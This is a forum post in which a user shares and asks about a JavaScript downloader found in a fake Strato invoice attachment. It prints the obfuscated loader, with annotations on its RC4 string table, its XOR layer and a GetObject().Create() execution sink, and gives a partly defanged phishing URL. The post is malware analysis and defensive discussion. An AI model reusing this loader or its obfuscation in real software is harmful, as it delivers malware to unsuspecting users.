Malicious JS Script (in fake PDF) "function catsville" (Trojan, ISB.Downloader!gen569)

Discussion in 'Scripting' started by itsmemario1, Mar 4, 2024.

    Hi,

    an email from "[email protected]" had a PDF attached, but the file carried an additional .JS (JavaScript) extension. It was disguised as a "Strato invoice" (Strato is a German provider/hoster).

    The email contained a bit.ly link, which led to the following address.

    I clicked it in an isolated test environment:
    (so be careful from here on!)


    "h**ps://rechnung-strato.codinsasac.com.pe/t7u8wc9"

    A click on the (bit.ly) link immediately downloaded the PDF file with the additional .JS extension.

    The website without the "t7u8wc9" path shows the standard Apache2 Ubuntu default page ("It works!").
    h**ps://rechnung-strato.codinsasac.com.pe

    The hoster appears to be www.haulmer.com / .net (?) in Chile.
    https://de.linkedin.com/company/haulmer?trk=ppro_cprof
    https://www.haulmer.com/

    Windows identifies it as a PDF but, of course, fails to open it.

    ===================================
    The file itself starts with:

    //that OLIPHANT least case most freedom perversity THE kingdoms one civil PALACE AND most Edinburgh the factor upon truth too justification
    ===================================

    The file contains a lot of random filler text about Scottish history ... nonsense.

    It also includes the following JavaScript in the middle part (and some more at the end), which VirusTotal (and Windows) flag as:

    Trojan:Script/Wacatac.H!ml
    Downloader.Agent/JS!1.EEFF (CLASSIC)
    ISB.Downloader!gen569


    The question is: since Windows failed to open the PDF, what are the chances that the JavaScript code actually executed in the background?


    I have added the JavaScript code below:


    PART1:

    Code:
    // Obfuscated string table. The four tokens are not plaintext: cornish()
    // base64-decodes and then RC4-decrypts each one on demand with a
    // per-slot key supplied at the call site (see petshop/cornish below).
    function catsville() {
        var rexes = [
            'rSkyWOmPkGxcR8olWP9uW5mDWRiyENBdGSkpwqSrpvddGCoRsKnpemk8zKldSW',
            'l0m7W7e',
            'WPebDq3cSwlcJSo/vSk7W6vAW7aC',
            'j8oGW5NdSZtdNWpcMSkTdbpdQK0c'
        ];
        // Self-rewriting: after the first call the function is replaced by a
        // closure that simply returns the array (a common obfuscator idiom).
        catsville = function () {
            return rexes;
        };
        return catsville();
    }
    // Accessor used by the call sites near the end of PART1. The first
    // argument is a table index biased by 0x346 (0x346..0x349 -> slots 0..3
    // of catsville()); the second is the RC4 key for that slot.
    function petshop(polenta, troiger) {
        return cornish(polenta - 0x346, troiger);
    }
    // String-table decoder. On first use it installs a base64 decoder and an
    // RC4 routine, then every call returns table[index] decrypted with the
    // given key, memoised in a cache. The layout (self-rewriting function,
    // random six-letter property names 'TkkIPW' / 'LPGVYV' / 'sMrOnV',
    // base64 + RC4 string array) looks like javascript-obfuscator's
    // string-array/RC4 mode; all the hex-arithmetic expressions below fold
    // to small constants, which are noted inline.
    function cornish(petshop, polenta) {
        var troiger = catsville();
        cornish = function (rexes, Petshop) {
            // (-0x219a + 0x13*0x185 + 0x7*0xad) == 0: the index is used as-is.
            rexes = rexes - (-0x219a + 0x13 * 0x185 + 0x7 * 0xad);
            var Cornish = troiger[rexes];
            // One-time initialisation, guarded by the 'TkkIPW' flag.
            if (cornish['TkkIPW'] === undefined) {
                // Base64 decoder (standard alphabet). The loop constants fold
                // to the textbook atob polyfill: accumulate 6 bits per input
                // character and emit `255 & bits >> (-2*i & 6)` on every
                // fourth character; the second loop percent-encodes the
                // resulting bytes so decodeURIComponent() performs the UTF-8
                // decoding.
                var Catsville = function (cAtsville) {
                    var cOrnish = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                    var pOlenta = '';
                    var tRoiger = '';
                    for (var rExes = 0x6 * 0x515 + -0x2519 * -0x1 + -0x4397, PEtshop, POlenta, CAtsville = -0x7fa * -0x1 + 0x7 * 0x531 + 0x1 * -0x2c51; POlenta = cAtsville['charAt'](CAtsville++); ~POlenta && (PEtshop = rExes % (0x20b8 + 0x1 * -0x1675 + -0xa3f) ? PEtshop * (0x2 * -0x1d8 + -0x2535 + 0x2925) + POlenta : POlenta, rExes++ % (0x1e8 + 0x4 + -0x2 * 0xf4)) ? pOlenta += String['fromCharCode'](-0x2 * -0x10d7 + -0x1 * 0x247f + 0x3d0 & PEtshop >> (-(-0xb22 + -0x2dd + -0x1 * -0xe01) * rExes & 0x247b + -0x1f * -0xd4 + -0xc6d * 0x5)) : 0xe89 + 0x1 * -0x389 + -0xb00) {
                        POlenta = cOrnish['indexOf'](POlenta);
                    }
                    // toString(16) and slice(-2): each byte becomes "%xx".
                    for (var COrnish = 0x1a * -0x3 + 0x245b + -0x240d, TRoiger = pOlenta['length']; COrnish < TRoiger; COrnish++) {
                        tRoiger += '%' + ('00' + pOlenta['charCodeAt'](COrnish)['toString'](-0x1d87 * 0x1 + 0x2154 + -0x3bd))['slice'](-(0x1976 + 0x873 * -0x3 + -0x1b));
                    }
                    return decodeURIComponent(tRoiger);
                };
                // RC4: base64-decode the ciphertext (RExes), run the 256-entry
                // key-scheduling loop with the key (trOiger), then XOR each
                // ciphertext byte with the keystream. Every modulus below
                // folds to 256.
                var pEtshop = function (RExes, trOiger) {
                    var caTsville = [], coRnish = -0xd * 0x171 + 0x1da4 + -0xae7, peTshop, poLenta = '';
                    RExes = Catsville(RExes);
                    var reXes;
                    for (reXes = -0x7eb * 0x2 + 0x1c35 + 0xc5f * -0x1; reXes < 0x25 * 0xe5 + 0x1187 * 0x1 + -0x8 * 0x634; reXes++) {
                        caTsville[reXes] = reXes;
                    }
                    for (reXes = -0x27 * -0x7f + 0x1 * -0xd85 + -0x5d4; reXes < 0x1322 * -0x2 + 0x1 * 0x2485 + -0x1 * -0x2bf; reXes++) {
                        coRnish = (coRnish + caTsville[reXes] + trOiger['charCodeAt'](reXes % trOiger['length'])) % (-0x7d3 + -0x6e2 * -0x1 + 0x1f1 * 0x1);
                        peTshop = caTsville[reXes];
                        caTsville[reXes] = caTsville[coRnish];
                        caTsville[coRnish] = peTshop;
                    }
                    reXes = 0x5 * -0x799 + -0x143c + 0x3a39;
                    coRnish = 0x2577 + 0x22cb + -0x4842;
                    for (var PoLenta = -0x1 * 0x1102 + 0xe00 + 0x302; PoLenta < RExes['length']; PoLenta++) {
                        reXes = (reXes + (-0x2 * -0x65d + 0x3 * -0x2b3 + -0x4a0)) % (-0x1 * 0xeaf + 0x586 * -0x1 + 0x1535);
                        coRnish = (coRnish + caTsville[reXes]) % (-0xdb7 + 0x5d * -0x59 + -0x4 * -0xbc3);
                        peTshop = caTsville[reXes];
                        caTsville[reXes] = caTsville[coRnish];
                        caTsville[coRnish] = peTshop;
                        poLenta += String['fromCharCode'](RExes['charCodeAt'](PoLenta) ^ caTsville[(caTsville[reXes] + caTsville[coRnish]) % (0xf8e + -0x22af + 0x1421)]);
                    }
                    return poLenta;
                };
                // Decoder is stored on the function object; the outer
                // parameter `petshop` is repurposed as the memo cache (it is
                // rebound to this closure's `arguments` object).
                cornish['LPGVYV'] = pEtshop;
                petshop = arguments;
                cornish['TkkIPW'] = !![];
            }
            // Expression folds to 0: the first table entry is used as a
            // prefix for the cache key.
            var Rexes = troiger[-0x11 * 0x14e + -0x24a1 + 0x3acf * 0x1];
            var Troiger = rexes + Rexes;
            var Polenta = petshop[Troiger];
            if (!Polenta) {
                if (cornish['sMrOnV'] === undefined) {
                    cornish['sMrOnV'] = !![];
                }
                // Cache miss: decrypt with the caller's key and memoise.
                Cornish = cornish['LPGVYV'](Cornish, Petshop);
                petshop[Troiger] = Cornish;
            } else {
                Cornish = Polenta;
            }
            return Cornish;
        };
        return cornish(petshop, polenta);
    }
    // Second, much simpler lookup: returns a plain property name from the
    // annrand() table ('length' / 'push'). The offset expression folds to 0,
    // so procuretto(0x0) is 'length' and procuretto(0x1) is 'push'. The
    // second parameter is never used.
    function procuretto(chippotle, monblan) {
        var retorter = annrand();
        procuretto = function (chilolsa, Retorter) {
            chilolsa = chilolsa - (-0xec1 + 0xc46 + 0x27b);
            var Chilolsa = retorter[chilolsa];
            return Chilolsa;
        };
        return procuretto(chippotle, monblan);
    }
    // Converts a hex string into an array of byte values. With the constants
    // folded this reads: for (i = 0; i < s.length; i += 2)
    //   out.push(parseInt(s.substr(i, 2), 16));
    // chilolsa(0x0) resolves to 'length' and chilolsa(0x1) to 'push'.
    function randthatpeopleHadCHAPTER(chippotle) {
        var chilolsa = procuretto;
        var monblan = [];
        for (var retorter = -0x1 * -0x7fa + -0x123f + 0x1 * 0xa45; retorter < chippotle[chilolsa(0x0)]; retorter += 0x734 + -0x2b * 0xcd + -0x1 * -0x1b3d) {
            monblan[chilolsa(0x1)](parseInt(chippotle['substr'](retorter, -0x53 * -0x71 + 0x1a86 + -0x3f27), -0x153f + 0x1e9d + -0x94e));
        }
        return monblan;
    }
    // Property-name table for procuretto(): index 0 is 'length', index 1 is
    // 'push'. Same self-rewriting trick as catsville().
    function annrand() {
        var Procuretto = [
            'length',
            'push'
        ];
        annrand = function () {
            return Procuretto;
        };
        return annrand();
    }
    // Second obfuscation layer: two hex blobs (elided in this copy of the
    // post) are turned into byte arrays, then the first is XORed with the
    // second as a repeating key to produce a string. This is the only table
    // entry that is not decoded through cornish().
    var rplacedthekingambition = randthatpeopleHadCHAPTER('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');
    var rSCOTTISHhas134that = randthatpeopleHadCHAPTER('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');
    var rmaintainingthekingdomsANDREWwhichwalls = '';
    for (var rLENNOXvolumesystemwhen = 0; rLENNOXvolumesystemwhen < rplacedthekingambition.length; rLENNOXvolumesystemwhen++) {
        rmaintainingthekingdomsANDREWwhichwalls += String.fromCharCode(rplacedthekingambition[rLENNOXvolumesystemwhen] ^ rSCOTTISHhas134that[rLENNOXvolumesystemwhen % rSCOTTISHhas134that.length]);
    }
    // Five decoded strings consumed by PART2/PART3. Index mapping after the
    // 0x346 bias: [0] = table slot 0, [1] = slot 2, [2] = slot 3,
    // [3] = the XOR-decoded string above, [4] = slot 1. Each petshop() call
    // carries the RC4 key for its slot as the second argument.
    var kxqvutewdjribazg = [
        petshop(0x346, '7[X3'),
        petshop(0x348, 'VXQ5'),
        petshop(0x349, 'Uw]('),
        rmaintainingthekingdomsANDREWwhichwalls,
        petshop(0x347, 'E*pJ')
    ];
    

    PART2:
    Code:
    // PART2: obtain a COM object and assemble the final argument string.
    //
    // GetObject() is a Windows Script Host global (JScript run by
    // wscript.exe / cscript.exe), not browser JavaScript. This code therefore
    // only runs if the .js file is launched by the script host; a PDF reader
    // rejecting the file does not execute it. Which object is obtained
    // depends on the decoded string kxqvutewdjribazg[0], which is not
    // recoverable from the post — presumably a WMI/COM moniker, given that
    // PART3 calls .Create() on it (verify in a sandbox).
    var vyjfoihnqwzkcpes=""
    var apynufseqzkltdjv = GetObject(kxqvutewdjribazg[0]);
    var array = kxqvutewdjribazg;
    
    var arrayLength = array.length;
    
    // array has five elements, so this condition is always true and just
    // declares the accumulator.
    if(1696 < 0 || 1696 >= arrayLength) {
      
    var iyqevnprtkbjushl = 0;
    }
    
    
    
    // Junk loop. Almost every iteration indexes past the array and yields
    // "undefined" concatenations that are immediately overwritten; the final
    // iteration (index == 1695) reads array[2], array[1], array[3], so the
    // net effect is simply:
    //   iyqevnprtkbjushl = array[2] + array[1] + array[3];
    for (var index = 0; index < 1696; index++) {
        var zmrshncjlxwbtvgp = array[1696 - index + 1];
        var mprtdeczfbulgqyi = array[1696 - index];
        var jkmlfbdpvqeirtoc = array[1696 - index + 2];
     
        iyqevnprtkbjushl = zmrshncjlxwbtvgp + mprtdeczfbulgqyi + jkmlfbdpvqeirtoc;
     
    }
    
    vyjfoihnqwzkcpes = iyqevnprtkbjushl;
    
    

    PART3:
    Code:
    // PART3: the execution sink. Three Create() calls on the object from
    // GetObject(), each with a decoded string: table slot 1, table slot 2,
    // and the concatenation built in PART2. What Create() does depends on
    // the object behind kxqvutewdjribazg[0]; with a WMI moniker this method
    // name matches process creation, which fits the "downloader" verdicts in
    // the post, but that cannot be confirmed without the decoded strings.
    // For detection, the GetObject(...).Create(...) pattern in a .js
    // attachment is itself the indicator worth alerting on.
    apynufseqzkltdjv.Create(kxqvutewdjribazg[4]);
    
    apynufseqzkltdjv.Create(kxqvutewdjribazg[1+0]);
    apynufseqzkltdjv.Create(vyjfoihnqwzkcpes);